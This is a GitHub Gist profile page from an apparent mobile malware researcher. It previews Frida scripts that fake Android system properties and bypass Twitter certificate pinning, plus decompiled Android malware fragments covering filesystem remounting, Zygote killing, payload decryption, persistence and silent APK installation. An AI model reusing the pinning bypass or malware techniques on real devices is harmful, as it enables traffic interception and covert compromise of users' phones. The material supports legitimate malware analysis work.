Skip to content

Instantly share code, notes, and snippets.

View alximw's full-sized avatar
🫥

Alejandro calleja Cortiñas alximw

🫥
20 followers · 19 following
  • Zimperium
  • Madrid, Spain
View GitHub Profile
@alximw
alximw / property_find.js
Created May 29, 2023 14:18
Hook bionic's SystemProperty::Find(const * char property)
/* the struct * prop_info that we get after a call to systemProperty::Find() are mapped in read-only
shared mem (mmaped /dev/__properties__/u:object_r:exported_default_prop:s0) hence we can't remap it
as +rw. Instead, we create a copy using Memory.dup. With dup we copy the whole page pointed by the
struct * prop_info, and we get a pointer to it. To prevent the GC from deallocating the copy,
we create this cached_prop_dict, where the keys are going to be the names of the properties and the
values are goint to be the pointers to the pages. Everytime a call to Find() is issued, we check if
we should tamper it and check the cache, creating the entry if needed and returning the ptr to the
copied page. If the entry does not existm we create the copy and modify *(struct * prop_info) + 0x4
with the value we want the property to have */
var cached_prop_info = {}
@alximw
alximw / bypas_cert_pinning_twitter.js
Created March 17, 2020 09:31
while(!Java.available);
if(Java.available) {
Java.perform(function() {
try {
var TrustManagerImpl = Java.use('com.android.org.conscrypt.TrustManagerImpl');
var array_list = Java.use("java.util.ArrayList");
TrustManagerImpl.verifyChain.implementation = function (untrustedChain, trustAnchorChain, host, clientAuth, ocspData, tlsSctData) {
return untrustedChain;
}
@alximw
alximw / InfoGathering.java
Last active October 28, 2019 13:36
package safiap.framework.sdk.b;
import android.content.Context;
import android.content.SharedPreferences.Editor;
import android.net.wifi.WifiInfo;
import android.net.wifi.WifiManager;
import android.os.Build.VERSION;
import android.os.Build;
import android.telephony.TelephonyManager;
import android.text.TextUtils;
@alximw
alximw / remountAndKillZygote.java
Created October 24, 2019 12:48
public final void remountAndKillZygote() {
StringBuilder v0 = new StringBuilder().append(this).append(Decoder.decodeBase64("b25TdGFydENvbW1hbmQ9")); // onStartCommand=
int v1 = this.counter + 1;
this.counter = v1;
v0.append(v1);
if((this.b) && (stringUtils.checkScreenIsOF(this.ctx))) {
this.b = false;
stringUtils.WriteString2File("1", new File(this.ctx.getFilesDir() + "/klzg"));
SystemUtils.remount_fileSystem("/", "rw");
new File("/sbin/.tmpkcol").delete();
@alximw
alximw / PayloadDecryption.c
Created October 23, 2019 15:24
int __fastcall function_d(JNIEnv *a1, jobject a2, jobject ctx, jstring encryptedFileName, jstring outFile)
{
jobject ctx_1; // r6
JNIEnv *ENV_; // r4
jclass (__cdecl *FindClass)(JNIEnv *, const char *); // r7
char *v8; // r0
char *getAssets; // r7
char *v10; // r0
int getAssetsMethodID; // r0
jclass (__cdecl *FindClass_1)(JNIEnv *, const char *); // r6
@alximw
alximw / persistency.c
Created October 23, 2019 15:22
int __fastcall enablePackage(char *serviceName, int size)
{
char *serviceName_1; // r5
int v3; // r4
int result; // r0
char v5; // [sp+4h] [bp-114h]
serviceName_1 = serviceName;
v3 = size;
if ( (unsigned int)(checkSystemProperties() - 1) > 0xF )
@alximw
alximw / InstallSample.java
Created October 23, 2019 15:03
public static String installSample(Context arg11, String sampleName, String apk_name, String arg14) {
String v2_3;
int error_code;
String v5;
int v1_1;
String v2;
String packageName;
int v0 = .lastIndexOf(Decoder.decodeBase64(".apk"));
if(v0 > 0) {
packageName = sampleName;
@alximw
alximw / CheckMount.java
Created October 23, 2019 14:54
public static boolean remount_fileSystem(String filesystem, String mode) {
boolean v0_4;
Class v3 = SystemUtils.class;
synchronized(v3) {
StringBuilder v4 = new StringBuilder();
StringBuilder v5 = new StringBuilder();
StringBuilder v6 = new StringBuilder();
StringBuilder mode = new StringBuilder();
SystemUtils.getFSMountMode(filesystem, v4, v5, v6, mode);
if(mode.equalsIgnoreCase(mode.toString())) {
@alximw
alximw / manifest.xml
Created March 1, 2019 18:24
com.xksx.tosiok Manifest
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="28" android:compileSdkVersionCodename="9" package="com.xksx.tosiok">
<uses-sdk android:minSdkVersion="9" android:targetSdkVersion="21"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
<uses-permission android:name="android.permission.READ_PHONE_STATE"/>
<uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
<uses-permission android:name="android.permission.MOUNT_UNMOUNT_FILESYSTEMS"/>
<uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
<uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
@alximw
alximw / config.json
Created February 6, 2019 13:06
[{"status":"2","name":"olo"},{"status":"1","name":"gz"},{"status":"2","name":"sz"},{"status":"1","name":"yh"},{"status":"2","name":"csj"},{"status":"2","name":"baij"},{"status":"2","name":"yk"},{"status":"1","name":"bd"},{"status":"2","name":"jqb"},{"status":"2","name":"lh"},{"status":"1","name":"hp"},{"status":"2","name":"yq"},{"status":"2","name":"sl"},{"status":"2","name":"leji2"},{"status":"2","name":"hp3"},{"status":"2","name":"uu"},{"status":"2","name":"jdzl"},{"status":"2","name":"bb"},{"status":"2","name":"sjsj"},{"status":"2","name":"cp"},{"status":"1","name":"kmd"},{"status":"1","name":"dxt"}]